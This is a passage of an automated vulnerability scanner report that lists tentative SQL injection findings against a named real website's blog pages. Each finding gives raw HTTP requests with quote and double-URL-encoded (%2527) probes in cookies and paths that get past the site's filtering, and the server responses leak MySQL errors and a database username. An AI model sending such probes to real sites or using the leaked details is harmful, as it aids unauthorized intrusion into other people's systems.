Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:30:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:30:23 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:30:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27737


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.138. http://www.analyticspros.com/blog/seo/59-search-ranking-position-with-ga.html [optimizelyBuckets cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/59-search-ranking-position-with-ga.html

Issue detail

The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the optimizelyBuckets cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/seo/59-search-ranking-position-with-ga.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:24:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/59-search-ranking-position-with-ga.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:24:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:24:17 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:24:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.139. http://www.analyticspros.com/blog/seo/78-best-seo-video-matt-cutts-wordpress.html [ki_u cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/78-best-seo-video-matt-cutts-wordpress.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:26:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:26:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:27:14 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:27:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25533


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.140. http://www.analyticspros.com/blog/seo/78-best-seo-video-matt-cutts-wordpress.html [optimizelyBuckets cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/78-best-seo-video-matt-cutts-wordpress.html

Issue detail

The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the optimizelyBuckets cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:28:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:28:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:28:34 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:28:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25534


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.141. http://www.analyticspros.com/blog/urchin.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:40:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:40:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.142. http://www.analyticspros.com/blog/urchin/118-urchin-7-now-available.html [ki_t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/118-urchin-7-now-available.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin/118-urchin-7-now-available.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/urchin.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:28:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/118-urchin-7-now-available.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/urchin.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:28:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.143. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/urchin/121-urchin-7-new-interface-first-look.html%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:37:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/121-urchin-7-new-interface-first-look.html%2527%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:37:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:37:56 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:37:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.144. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:26:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:26:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.145. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html [optimizelyBuckets cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
